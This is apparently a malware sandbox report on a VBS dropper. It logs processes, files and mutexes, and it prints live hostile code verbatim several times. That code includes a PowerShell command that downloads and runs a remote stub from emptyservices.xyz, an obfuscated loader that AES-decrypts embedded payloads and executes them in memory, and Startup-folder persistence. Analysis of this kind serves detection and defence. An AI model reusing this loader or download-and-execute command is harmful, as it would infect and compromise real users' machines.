Source: powershell.exe, 00000003.00000002.1759342843.000001D0901B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1742529866.000001D08194B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1759342843.000001D090076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2417006944.0000025C57FB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2417006944.0000025C57E7A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2362046480.0000025C49A03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2362046480.0000025C480CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2637178911.000001F3A657B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2495584075.000001F3981F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2637178911.000001F3A66B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2495584075.000001F3967CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2597422708.0000020CD92A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2762765196.0000020CE904C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2762765196.0000020CE9183000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2597422708.0000020CDABF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000000D.00000002.2362046480.0000025C497B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2495584075.000001F397EC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2597422708.0000020CDA98C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.org
Source: powershell.exe, 0000000D.00000002.2362046480.0000025C497B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2495584075.000001F397EC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2597422708.0000020CDA98C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.orgX

System Summary

Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\c.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_00007FFD9BAB6D80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_00007FFD9BABCA90
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_00007FFD9BABCA35
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_00007FFD9BABC93B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_00007FFD9BABEDE0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_00007FFD9BACDD80
Source: 7299_output.vbs Initial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 2175
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 2232
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 2232
Source: classification engine Classification label: mal100.troj.expl.evad.winVBS@46/24@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7328:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7964:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7268:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7672:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7588:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6096:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7984:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\sY4aS2sV71cBiQtZ
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\c.bat
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\c.bat" "
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\7299_output.vbs"
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\7299_output.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\c.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\c.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Local\Temp\c.bat';$NHES='ErLgzntrLgzryrLgzPorLgzinrLgztrLgz'.Replace('rLgz', ''),'CHprLhHprLanHprLgeEHprLxtHprLensHprLionHprL'.Replace('HprL', ''),'CrvvlOevvlOavvlOtevvlODevvlOcrvvlOyvvlOptvvlOorvvlO'.Replace('vvlO', ''),'RemtKNamtKNdLmtKNinmtKNesmtKN'.Replace('mtKN', ''),'SptlAblittlAb'.Replace('tlAb', ''),'MaiShffnShffMoShffdShffulShffeShff'.Replace('Shff', ''),'GetKIgbCKIgburKIgbrKIgbenKIgbtPrKIgboKIgbceKIgbssKIgb'.Replace('KIgb', ''),'DecCIZVomCIZVprCIZVessCIZV'.Replace('CIZV', ''),'FrotqyzmBtqyzasetqyz6tqyz4Stqyztrtqyzitqyzngtqyz'.Replace('tqyz', ''),'ThZggrhZgganshZggfohZggrhZggmFhZgginahZgglBlhZggochZggkhZgg'.Replace('hZgg', ''),'InUneOvoUneOkeUneO'.Replace('UneO', ''),'ElLHtjemeLHtjntLHtjALHtjtLHtj'.Replace('LHtj', ''),'LoaKqbadKqba'.Replace('Kqba', ''),'CoqGYmpyqGYmToqGYm'.Replace('qGYm', '');powershell -w hidden;function fyfwL($itxzH){$CuCRJ=[System.Security.Cryptography.Aes]::Create();$CuCRJ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$CuCRJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$CuCRJ.Key=[System.Convert]::($NHES[8])('gdCIwM8MuMxo7da/mrtCyIbOUmXu2FksViNDT/cHSz8=');$CuCRJ.IV=[System.Convert]::($NHES[8])('gcSSwI2zcUs6f9nNUiiZ/Q==');$kPfFB=$CuCRJ.($NHES[2])();$bvXzm=$kPfFB.($NHES[9])($itxzH,0,$itxzH.Length);$kPfFB.Dispose();$CuCRJ.Dispose();$bvXzm;}function RmDOY($itxzH){$dolaJ=New-Object System.IO.MemoryStream(,$itxzH);$wpdCQ=New-Object System.IO.MemoryStream;$MfuWs=New-Object System.IO.Compression.GZipStream($dolaJ,[IO.Compression.CompressionMode]::($NHES[7]));$MfuWs.($NHES[13])($wpdCQ);$MfuWs.Dispose();$dolaJ.Dispose();$wpdCQ.Dispose();$wpdCQ.ToArray();}$iiIRz=[System.IO.File]::($NHES[3])([Console]::Title);$bZoFj=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 5).Substring(2))));$NLfYF=RmDOY (fyfwL 
([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 6).Substring(2))));[System.Reflection.Assembly]::($NHES[12])([byte[]]$NLfYF).($NHES[0]).($NHES[10])($null,$null);[System.Reflection.Assembly]::($NHES[12])([byte[]]$bZoFj).($NHES[0]).($NHES[10])($null,$null); "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd';$NHES='ErLgzntrLgzryrLgzPorLgzinrLgztrLgz'.Replace('rLgz', ''),'CHprLhHprLanHprLgeEHprLxtHprLensHprLionHprL'.Replace('HprL', ''),'CrvvlOevvlOavvlOtevvlODevvlOcrvvlOyvvlOptvvlOorvvlO'.Replace('vvlO', ''),'RemtKNamtKNdLmtKNinmtKNesmtKN'.Replace('mtKN', ''),'SptlAblittlAb'.Replace('tlAb', ''),'MaiShffnShffMoShffdShffulShffeShff'.Replace('Shff', ''),'GetKIgbCKIgburKIgbrKIgbenKIgbtPrKIgboKIgbceKIgbssKIgb'.Replace('KIgb', ''),'DecCIZVomCIZVprCIZVessCIZV'.Replace('CIZV', ''),'FrotqyzmBtqyzasetqyz6tqyz4Stqyztrtqyzitqyzngtqyz'.Replace('tqyz', ''),'ThZggrhZgganshZggfohZggrhZggmFhZgginahZgglBlhZggochZggkhZgg'.Replace('hZgg', ''),'InUneOvoUneOkeUneO'.Replace('UneO', ''),'ElLHtjemeLHtjntLHtjALHtjtLHtj'.Replace('LHtj', ''),'LoaKqbadKqba'.Replace('Kqba', ''),'CoqGYmpyqGYmToqGYm'.Replace('qGYm', '');powershell -w hidden;function fyfwL($itxzH){$CuCRJ=[System.Security.Cryptography.Aes]::Create();$CuCRJ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$CuCRJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$CuCRJ.Key=[System.Convert]::($NHES[8])('gdCIwM8MuMxo7da/mrtCyIbOUmXu2FksViNDT/cHSz8=');$CuCRJ.IV=[System.Convert]::($NHES[8])('gcSSwI2zcUs6f9nNUiiZ/Q==');$kPfFB=$CuCRJ.($NHES[2])();$bvXzm=$kPfFB.($NHES[9])($itxzH,0,$itxzH.Length);$kPfFB.Dispose();$CuCRJ.Dispose();$bvXzm;}function RmDOY($itxzH){$dolaJ=New-Object System.IO.MemoryStream(,$itxzH);$wpdCQ=New-Object System.IO.MemoryStream;$MfuWs=New-Object System.IO.Compression.GZipStream($dolaJ,[IO.Compression.CompressionMode]::($NHES[7]));$MfuWs.($NHES[13])($wpdCQ);$MfuWs.Dispose();$dolaJ.Dispose();$wpdCQ.Dispose();$wpdCQ.ToArray();}$iiIRz=[System.IO.File]::($NHES[3])([Console]::Title);$bZoFj=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 
5).Substring(2))));$NLfYF=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 6).Substring(2))));[System.Reflection.Assembly]::($NHES[12])([byte[]]$NLfYF).($NHES[0]).($NHES[10])($null,$null);[System.Reflection.Assembly]::($NHES[12])([byte[]]$bZoFj).($NHES[0]).($NHES[10])($null,$null); "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /nobreak /t 1
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd';$NHES='ErLgzntrLgzryrLgzPorLgzinrLgztrLgz'.Replace('rLgz', ''),'CHprLhHprLanHprLgeEHprLxtHprLensHprLionHprL'.Replace('HprL', ''),'CrvvlOevvlOavvlOtevvlODevvlOcrvvlOyvvlOptvvlOorvvlO'.Replace('vvlO', ''),'RemtKNamtKNdLmtKNinmtKNesmtKN'.Replace('mtKN', ''),'SptlAblittlAb'.Replace('tlAb', ''),'MaiShffnShffMoShffdShffulShffeShff'.Replace('Shff', ''),'GetKIgbCKIgburKIgbrKIgbenKIgbtPrKIgboKIgbceKIgbssKIgb'.Replace('KIgb', ''),'DecCIZVomCIZVprCIZVessCIZV'.Replace('CIZV', ''),'FrotqyzmBtqyzasetqyz6tqyz4Stqyztrtqyzitqyzngtqyz'.Replace('tqyz', ''),'ThZggrhZgganshZggfohZggrhZggmFhZgginahZgglBlhZggochZggkhZgg'.Replace('hZgg', ''),'InUneOvoUneOkeUneO'.Replace('UneO', ''),'ElLHtjemeLHtjntLHtjALHtjtLHtj'.Replace('LHtj', ''),'LoaKqbadKqba'.Replace('Kqba', ''),'CoqGYmpyqGYmToqGYm'.Replace('qGYm', '');powershell -w hidden;function fyfwL($itxzH){$CuCRJ=[System.Security.Cryptography.Aes]::Create();$CuCRJ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$CuCRJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$CuCRJ.Key=[System.Convert]::($NHES[8])('gdCIwM8MuMxo7da/mrtCyIbOUmXu2FksViNDT/cHSz8=');$CuCRJ.IV=[System.Convert]::($NHES[8])('gcSSwI2zcUs6f9nNUiiZ/Q==');$kPfFB=$CuCRJ.($NHES[2])();$bvXzm=$kPfFB.($NHES[9])($itxzH,0,$itxzH.Length);$kPfFB.Dispose();$CuCRJ.Dispose();$bvXzm;}function RmDOY($itxzH){$dolaJ=New-Object System.IO.MemoryStream(,$itxzH);$wpdCQ=New-Object System.IO.MemoryStream;$MfuWs=New-Object System.IO.Compression.GZipStream($dolaJ,[IO.Compression.CompressionMode]::($NHES[7]));$MfuWs.($NHES[13])($wpdCQ);$MfuWs.Dispose();$dolaJ.Dispose();$wpdCQ.Dispose();$wpdCQ.ToArray();}$iiIRz=[System.IO.File]::($NHES[3])([Console]::Title);$bZoFj=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 
5).Substring(2))));$NLfYF=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 6).Substring(2))));[System.Reflection.Assembly]::($NHES[12])([byte[]]$NLfYF).($NHES[0]).($NHES[10])($null,$null);[System.Reflection.Assembly]::($NHES[12])([byte[]]$bZoFj).($NHES[0]).($NHES[10])($null,$null); "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /nobreak /t 1
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\c.bat" "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\c.bat" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Local\Temp\c.bat';$NHES='ErLgzntrLgzryrLgzPorLgzinrLgztrLgz'.Replace('rLgz', ''),'CHprLhHprLanHprLgeEHprLxtHprLensHprLionHprL'.Replace('HprL', ''),'CrvvlOevvlOavvlOtevvlODevvlOcrvvlOyvvlOptvvlOorvvlO'.Replace('vvlO', ''),'RemtKNamtKNdLmtKNinmtKNesmtKN'.Replace('mtKN', ''),'SptlAblittlAb'.Replace('tlAb', ''),'MaiShffnShffMoShffdShffulShffeShff'.Replace('Shff', ''),'GetKIgbCKIgburKIgbrKIgbenKIgbtPrKIgboKIgbceKIgbssKIgb'.Replace('KIgb', ''),'DecCIZVomCIZVprCIZVessCIZV'.Replace('CIZV', ''),'FrotqyzmBtqyzasetqyz6tqyz4Stqyztrtqyzitqyzngtqyz'.Replace('tqyz', ''),'ThZggrhZgganshZggfohZggrhZggmFhZgginahZgglBlhZggochZggkhZgg'.Replace('hZgg', ''),'InUneOvoUneOkeUneO'.Replace('UneO', ''),'ElLHtjemeLHtjntLHtjALHtjtLHtj'.Replace('LHtj', ''),'LoaKqbadKqba'.Replace('Kqba', ''),'CoqGYmpyqGYmToqGYm'.Replace('qGYm', '');powershell -w hidden;function fyfwL($itxzH){$CuCRJ=[System.Security.Cryptography.Aes]::Create();$CuCRJ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$CuCRJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$CuCRJ.Key=[System.Convert]::($NHES[8])('gdCIwM8MuMxo7da/mrtCyIbOUmXu2FksViNDT/cHSz8=');$CuCRJ.IV=[System.Convert]::($NHES[8])('gcSSwI2zcUs6f9nNUiiZ/Q==');$kPfFB=$CuCRJ.($NHES[2])();$bvXzm=$kPfFB.($NHES[9])($itxzH,0,$itxzH.Length);$kPfFB.Dispose();$CuCRJ.Dispose();$bvXzm;}function RmDOY($itxzH){$dolaJ=New-Object System.IO.MemoryStream(,$itxzH);$wpdCQ=New-Object System.IO.MemoryStream;$MfuWs=New-Object System.IO.Compression.GZipStream($dolaJ,[IO.Compression.CompressionMode]::($NHES[7]));$MfuWs.($NHES[13])($wpdCQ);$MfuWs.Dispose();$dolaJ.Dispose();$wpdCQ.Dispose();$wpdCQ.ToArray();}$iiIRz=[System.IO.File]::($NHES[3])([Console]::Title);$bZoFj=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 5).Substring(2))));$NLfYF=RmDOY (fyfwL 
([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 6).Substring(2))));[System.Reflection.Assembly]::($NHES[12])([byte[]]$NLfYF).($NHES[0]).($NHES[10])($null,$null);[System.Reflection.Assembly]::($NHES[12])([byte[]]$bZoFj).($NHES[0]).($NHES[10])($null,$null); "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /nobreak /t 1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd"Jump to behavior
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd';$NHES='ErLgzntrLgzryrLgzPorLgzinrLgztrLgz'.Replace('rLgz', ''),'CHprLhHprLanHprLgeEHprLxtHprLensHprLionHprL'.Replace('HprL', ''),'CrvvlOevvlOavvlOtevvlODevvlOcrvvlOyvvlOptvvlOorvvlO'.Replace('vvlO', ''),'RemtKNamtKNdLmtKNinmtKNesmtKN'.Replace('mtKN', ''),'SptlAblittlAb'.Replace('tlAb', ''),'MaiShffnShffMoShffdShffulShffeShff'.Replace('Shff', ''),'GetKIgbCKIgburKIgbrKIgbenKIgbtPrKIgboKIgbceKIgbssKIgb'.Replace('KIgb', ''),'DecCIZVomCIZVprCIZVessCIZV'.Replace('CIZV', ''),'FrotqyzmBtqyzasetqyz6tqyz4Stqyztrtqyzitqyzngtqyz'.Replace('tqyz', ''),'ThZggrhZgganshZggfohZggrhZggmFhZgginahZgglBlhZggochZggkhZgg'.Replace('hZgg', ''),'InUneOvoUneOkeUneO'.Replace('UneO', ''),'ElLHtjemeLHtjntLHtjALHtjtLHtj'.Replace('LHtj', ''),'LoaKqbadKqba'.Replace('Kqba', ''),'CoqGYmpyqGYmToqGYm'.Replace('qGYm', '');powershell -w hidden;function fyfwL($itxzH){$CuCRJ=[System.Security.Cryptography.Aes]::Create();$CuCRJ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$CuCRJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$CuCRJ.Key=[System.Convert]::($NHES[8])('gdCIwM8MuMxo7da/mrtCyIbOUmXu2FksViNDT/cHSz8=');$CuCRJ.IV=[System.Convert]::($NHES[8])('gcSSwI2zcUs6f9nNUiiZ/Q==');$kPfFB=$CuCRJ.($NHES[2])();$bvXzm=$kPfFB.($NHES[9])($itxzH,0,$itxzH.Length);$kPfFB.Dispose();$CuCRJ.Dispose();$bvXzm;}function RmDOY($itxzH){$dolaJ=New-Object System.IO.MemoryStream(,$itxzH);$wpdCQ=New-Object System.IO.MemoryStream;$MfuWs=New-Object System.IO.Compression.GZipStream($dolaJ,[IO.Compression.CompressionMode]::($NHES[7]));$MfuWs.($NHES[13])($wpdCQ);$MfuWs.Dispose();$dolaJ.Dispose();$wpdCQ.Dispose();$wpdCQ.ToArray();}$iiIRz=[System.IO.File]::($NHES[3])([Console]::Title);$bZoFj=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 5).Substring(2))));$NLfYF=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 6).Substring(2))));[System.Reflection.Assembly]::($NHES[12])([byte[]]$NLfYF).($NHES[0]).($NHES[10])($null,$null);[System.Reflection.Assembly]::($NHES[12])([byte[]]$bZoFj).($NHES[0]).($NHES[10])($null,$null); "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd"
